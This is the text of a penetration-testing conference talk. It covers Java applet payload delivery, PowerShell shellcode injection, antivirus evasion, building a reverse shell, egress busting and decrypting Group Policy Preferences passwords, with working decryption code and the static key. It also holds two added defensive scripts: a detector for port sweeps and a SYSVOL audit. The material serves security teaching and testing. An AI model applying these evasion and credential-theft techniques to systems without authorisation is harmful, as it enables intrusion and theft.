BSides Las Vegas: Secret Pentesting Techniques, Shhh...

Dave Kennedy, Founder, Principal Security Consultant
Email: davek@trustedsec.com
https://www.trustedsec.com
@TrustedSec

Introduction
• As penetration testers, exploit writers, huggers, etc., we have secret techniques we always use.
• Although some may or may not be public, they are generally obscure and not well known.
• The purpose of today's talk is to show you my secrets: some of the techniques I use that aren't widely known.
• Why show you? I'm an open book on everything I do, and sharing is what it's all about.

Technique #1
• Java Applet Attack (SET) – well-known attack method, right?
• Do you know how it actually works?
• Do you know the techniques behind it that make it successful?

ZOMG APT
• News agencies around the world discovered a new and extremely advanced zero-day exploit against Java.
• Made me feel kind of special =)
• How did people find out it was SET?

ILIKEHUGS

DEMO: Walking through the Attack

Explaining the Applet
• Parameters that are injected into the HTML code are pulled from the Applet.
• Parameters tell the Applet which attacks to use.
• Obfuscated and randomized each time.

Method 1 – Binary Dropper
• Binary is downloaded from the attacker machine via web server (Java downloader).
• Binary is obfuscated for each deployment, rewriting the binary on the fly (import pefile): a combination of PE manipulation and UPX.

DEMO: Binary Dropping Technique

Method 1 – Weak Sauce
• Binaries are easily picked up by AV if signatures focus on the obfuscation techniques (SET changes them each version).
• Direct interaction with the Windows file system and writing to disk.
• Multiple points of evidence on the victim machine.

Method 2 – Shellcodeexec
• The Shellcodeexec method drops a custom compiled and modified version of shellcodeexec by Bernardo Damele.
• The executable takes an int main(int argc, char* argv[]) parameter for alphanumeric shellcode.
• Uses VirtualAlloc for read, write, and execute memory space.
• Alphanumeric shellcode is executed in memory and the payload is delivered.

DEMO: ShellcodeExec

Method 2 – Easily detectable
• Shellcodeexec is a simple yet awesome method but still has a number of drawbacks.
• Like Method 1 – binaries can be picked up unless a custom version is created.
• Like Method 1 – direct interaction with the Windows file system and writing to disk.
• Multiple points of evidence on the victim machine.

Method 3 – Powershell Injection
• Technique discovered by Matthew Graeber (you rock).
• Detect if Powershell is installed (installed by default on Vista and Windows 7 and 8).
• Powershell gives us complete flexibility in a number of post-exploitation situations.

Method 3 – PS ShellCode Injection
• Applet detects if Powershell is installed on the system.
• Grabs the operating system type (x86 / x64).
• Deploys shellcode straight through Powershell.

DEMO: ShellcodeExec

Method 3 – Powershell Injection
• Never touches disk – AV / HIPS signatures go out the door.
• Extremely reliable and stable.
• Obfuscated each time so that memory inspection is extremely difficult.

PE Security Evasion

Scenario 1 – Dropping PE's like it's hot
• You're using Metasploit – all of them are being picked up by AV, HIPS, etc.
• Couple of cool ways to do this.
• In most cases, I will rewrite the exe template for Metasploit to customize the binary for evasion.

Modifying PE For Evasion in MSF
• Easiest way for me is to make a simple program that creates a RWX process, then have the program execute Metasploit shellcode.
• You can also modify the Metasploit exe.rb template and obfuscate the code that way.

PE Crypters
• One of my favorites was recently released, called Hyperion (Christian Ammann from nullsecurity.net).
• Encrypts the PE file using a randomized simple cipher key with AES 128.
• When the executable is run, it brute forces the AES key, then decrypts the PE file for you.

DEMO: Hyperion

Hyperion Encryption
• Very cool concept; easy to use and to write one for yourself.
• Ability to have a completely unique PE file each time.
• Slight downfall: the stub used for brute force is not polymorphic.

Building a Simple Reverse Shell

The Reverse Shell
• Connects out to the attacker (reverse shell).

Compiling Binaries
• PyInstaller – compiles Python code into a binary for you by wrapping the Python interpreter into the executable.
• Works on Linux, OSX, and Windows.

    python Configure.py
    python Makespec.py --onefile --noconsole shell.py
    python Build.py shell/shell.spec
    cd shell\dist

Making it easy – pybuild.py
• All code and samples will be released on the TrustedSec website soon.

DEMO: Building a Shell

Bypassing AV

Finding your way home

Bumping the Firewall
• A number of companies restrict ports outbound and only allow what's needed for the business.
• Trouble getting payloads out, especially if you only have one shot.

Egress Busting
• Few ways to do it.
• Attempt a staged reverse on every port.
• Metasploit has an ALLPORTS payload as well: a pre-staged payload for identifying a way out.

Egress Buster 0.2
• Server/client situation where the victim connects out on every port, 1024 ports at a time.
• Server listens for the connection and reports back.
• Here's where you can have some fun.
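Seen from the firewall, the client behaviour described above has a distinctive shape: one internal host attempting hundreds of distinct destination ports against one external host within a minute, and the handful of ports the firewall let through are exactly the egress holes a defender needs to close. The following Python is an added example written for this page, not code from the talk or from the Egress Buster tool: it runs a sliding-window distinct-port count over firewall log lines and reports, per flagged source, which ports were allowed out. The key=value log format, the addresses, the 1024–2047 port range and the three "open" ports are constructed for the example and are not any vendor's real syntax.

```python
"""Spot an egress-busting sweep in outbound firewall logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timezone

# Constructed key=value firewall log format, assumed for this example only.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) action=(?P<action>allow|deny) src=(?P<src>\S+) "
    r"dst=(?P<dst>\S+) dport=(?P<dport>\d+) proto=\w+$"
)


def parse_line(line):
    """Return (epoch_seconds, src, dport, action), or None if the line is not in our format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return ts.timestamp(), m["src"], int(m["dport"]), m["action"]


def detect_egress_sweeps(lines, min_ports=100, window=60):
    """Flag sources that touch >= min_ports distinct dports inside any `window`-second span.

    Returns {src: {"distinct_ports": peak, "allowed_ports": [...]}}, where
    allowed_ports are the outbound ports the firewall permitted for that source.
    """
    events = defaultdict(list)   # src -> [(ts, dport), ...]
    allowed = defaultdict(set)   # src -> ports that got an "allow"
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue  # ignore lines in other formats instead of aborting the scan
        ts, src, dport, action = ev
        events[src].append((ts, dport))
        if action == "allow":
            allowed[src].add(dport)

    findings = {}
    for src, evs in events.items():
        evs.sort()
        in_window = defaultdict(int)  # dport -> occurrences inside the sliding window
        lo, peak = 0, 0
        for ts, dport in evs:
            in_window[dport] += 1
            while ts - evs[lo][0] > window:  # drop events that fell out of the window
                old = evs[lo][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                lo += 1
            peak = max(peak, len(in_window))
        if peak >= min_ports:
            findings[src] = {"distinct_ports": peak, "allowed_ports": sorted(allowed[src])}
    return findings


def sample_log():
    """Constructed log: one host sweeping ports 1024-2047 (3 allowed) plus one normal host."""
    lines = []
    open_ports = {1080, 1194, 2000}  # assumed egress holes in the sample policy
    for i, port in enumerate(range(1024, 2048)):
        action = "allow" if port in open_ports else "deny"
        lines.append(f"2012-07-25T10:00:{i // 20:02d}Z action={action} "
                     f"src=10.0.5.23 dst=198.51.100.7 dport={port} proto=tcp")
    for sec, port in ((3, 443), (9, 80), (14, 443), (30, 53)):
        lines.append(f"2012-07-25T10:00:{sec:02d}Z action=allow "
                     f"src=10.0.5.40 dst=198.51.100.9 dport={port} proto=tcp")
    lines.append("this line is not in the expected format")
    return lines


if __name__ == "__main__":
    for src, info in detect_egress_sweeps(sample_log()).items():
        print(f"{src}: {info['distinct_ports']} distinct ports in one window; "
              f"allowed out on {info['allowed_ports']}")
```

The threshold of 100 distinct ports per minute is deliberately far above what ordinary client software does, so the normal host with four connections is never flagged; tune `min_ports` and `window` to the log volume of the environment, and treat the `allowed_ports` list as the remediation worklist for the outbound policy.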

Egress Buster Reverse Shell

Egress Buster Reverse Shell
• Released this week!
• Allows you to bust all ports inside the firewall and spawn a command shell.
• Custom, byte-compiled into an executable, so no AV picks this up.

DEMO: Egress Buster Reverse Shell

Egress Buster Reverse Shell Usage
• Recent penetration test – found file upload + execute binaries.
• Could not find a standard port out, i.e. 25, 53, 80, 443, etc.
• Wrote this to deploy and found several obscure ports that were allowed.

Fun with Group Policy

One of my PERSONAL Favorites
• How many times have we been on a pentest with just a domain user?
• Need that local administrator account for all of the domain computers?
Research from: Sogeti ESEC Pentest
Article: http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences

The Attack
• Navigate to a domain controller and hit up the SYSVOL share.
• Head to the domain name and Policies folder.
• Look for a GUID, then MACHINE\Preferences\Groups.
• Look for the Groups.xml file.

Contents of File

Static Key for AES Anyone?

Python Code

    # code was developed and created from
    # http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
    # (shown here in Python 3 form: bytes.fromhex replaces str.decode('hex'), and the
    #  CBC mode and all-zero IV that old pycrypto silently defaulted to are explicit)
    from Crypto.Cipher import AES
    from base64 import b64decode

    # static AES key that every Group Policy Preferences cpassword is encrypted with
    key = bytes.fromhex(
        "4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8"
        "f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b"
    )
    cpassword = b64decode("j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw=")
    o = AES.new(key, AES.MODE_CBC, iv=b"\x00" * 16).decrypt(cpassword)
    # strip the PKCS#7 padding (last byte gives its length), then decode UTF-16LE
    print(o[:-o[-1]].decode("utf-16-le"))

Decrypted Password

    >>> print(o[:-o[-1]].decode("utf-16-le"))
    Local*P4ssword!

Expanding on Groups.xml

More Passwords Stored
• The folks over at rewt dance (http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html) found a few more areas that store passwords using the cpassword attribute.
• Services, ScheduledTasks, SQL servers and much more are impacted.

List of Other Affected Areas (from rewt dance)
• Services\Services.xml
• ScheduledTasks\ScheduledTasks.xml
• DataSources\DataSources.xml
• Drives\Drives.xml
• Printers\Printers.xml

MSDN protocol documentation for these preference items:
http://msdn.microsoft.com/en-us/library/cc980070(v=prot.13)
http://msdn.microsoft.com/en-us/library/cc422920(v=prot.13)
http://msdn.microsoft.com/en-us/library/cc422918(v=prot.13)
http://msdn.microsoft.com/en-us/library/cc422926(v=prot.13)
http://msdn.microsoft.com/en-us/library/cc704598(v=prot.13)
http://msdn.microsoft.com/en-us/library/dd304114(v=prot.13)
http://msdn.microsoft.com/en-us/library/dd341350(v=prot.13)
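The decryption shown on the "Python Code" slide and the file list above together describe an audit a defender should run against their own SYSVOL: every one of those XML files is readable by any domain user, so any cpassword left in them is a cleartext credential for whoever looks. The following Python is an added example for this page, not code from the talk or the Sogeti or rewt dance articles. It walks a SYSVOL copy, parses the preference files named on the slides with the standard library, restores the base64 padding that Group Policy Preferences omit from stored values, decrypts each cpassword with the key from the slide and verifies the PKCS#7 padding, and reports the account each one belongs to so the offending policies can be found and removed. AES comes from pycryptodome with a fallback to the cryptography package; the sample SYSVOL tree, its policy GUID and account names are constructed here, with the slide's cpassword reused as the stored value.

```python
"""Audit a SYSVOL copy for Group Policy Preferences cpassword values (added example)."""
import base64
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

try:  # pycryptodome (or legacy pycrypto)
    from Crypto.Cipher import AES

    def _aes_cbc_decrypt(key, iv, data):
        return AES.new(key, AES.MODE_CBC, iv=iv).decrypt(data)
except ImportError:  # fall back to the 'cryptography' package
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def _aes_cbc_decrypt(key, iv, data):
        dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
        return dec.update(data) + dec.finalize()

# Static AES key from the slide: the same bytes for every domain.
GPP_KEY = bytes.fromhex(
    "4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8"
    "f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b"
)
# Preference files that can carry a cpassword attribute (Groups.xml plus the rewt dance list).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
# The attribute naming the account differs per preference type.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


def decrypt_cpassword(cpassword):
    """Decrypt one cpassword: base64, AES-CBC with an all-zero IV, PKCS#7, UTF-16LE."""
    cpassword += "=" * (-len(cpassword) % 4)  # GPP stores the base64 without '=' padding
    plain = _aes_cbc_decrypt(GPP_KEY, b"\x00" * 16, base64.b64decode(cpassword))
    pad = plain[-1]
    if not 1 <= pad <= 16 or plain[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding; value is corrupt")
    return plain[:-pad].decode("utf-16-le")


def find_cpasswords(sysvol_root):
    """Return (file, element, account, password) for every cpassword under sysvol_root."""
    hits = []
    for path in sorted(Path(sysvol_root).rglob("*.xml")):
        if path.name not in GPP_FILES:
            continue
        try:
            root = ET.parse(path).getroot()
        except ET.ParseError:
            continue  # malformed file: not a usable preference item
        for elem in root.iter():
            cpw = elem.get("cpassword")
            if not cpw:  # absent, or "" when the password was cleared
                continue
            account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "?")
            try:
                password = decrypt_cpassword(cpw)
            except (ValueError, UnicodeDecodeError):
                password = None  # still reported: the attribute is present
            hits.append((path.name, elem.tag, account, password))
    return hits


# Constructed sample SYSVOL content, not from any real domain: the policy GUID and
# account names are made up; the cpassword is the slide's value, stored once with
# and once without its base64 padding.
SAMPLE_CPASSWORD = "j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw="
_PREFS = "Policies/{00000000-1111-2222-3333-444444444444}/Machine/Preferences/"
SAMPLE_FILES = {
    _PREFS + "Groups/Groups.xml":
        '<Groups><User name="localadmin"><Properties action="U" userName="localadmin" '
        f'cpassword="{SAMPLE_CPASSWORD}"/></User></Groups>',
    _PREFS + "ScheduledTasks/ScheduledTasks.xml":
        '<ScheduledTasks><Task name="backup"><Properties runAs="CORP\\svc_backup" '
        f'cpassword="{SAMPLE_CPASSWORD.rstrip("=")}"/></Task></ScheduledTasks>',
    _PREFS + "Drives/Drives.xml":  # password cleared: nothing to report
        '<Drives><Drive name="H:"><Properties username="CORP\\share" cpassword=""/></Drive></Drives>',
    _PREFS + "Files/Files.xml":  # file type that never carries cpassword: skipped
        '<Files><File name="x"><Properties fromPath="\\\\srv\\x" targetPath="C:\\x"/></File></Files>',
}


def write_sample_sysvol(root):
    for rel, xml in SAMPLE_FILES.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(xml, encoding="utf-8")


def demo():
    """Write the constructed tree to a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        write_sample_sysvol(tmp)
        return find_cpasswords(tmp)


if __name__ == "__main__":
    for fname, tag, account, password in demo():
        print(f"{fname}: <{tag}> account={account} password={password or '<undecryptable>'}")
```

Point `find_cpasswords` at a copy of `\\<domain>\SYSVOL\<domain>\Policies` to audit a real domain; a value that fails the padding check is still listed, because the presence of the attribute, not its decryptability, is what needs fixing.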

There's a ton more of these… Hopefully I can make these a series.


Downloads
For the code and tools used in this presentation, head over to https://www.trustedsec.com and click on Downloads.

Secret Pentesting Techniques Shhh...
Dave Kennedy, Founder, Principal Security Consultant
Email: davek@trustedsec.com
https://www.trustedsec.com
TrustedSec, LLC
@TrustedSec
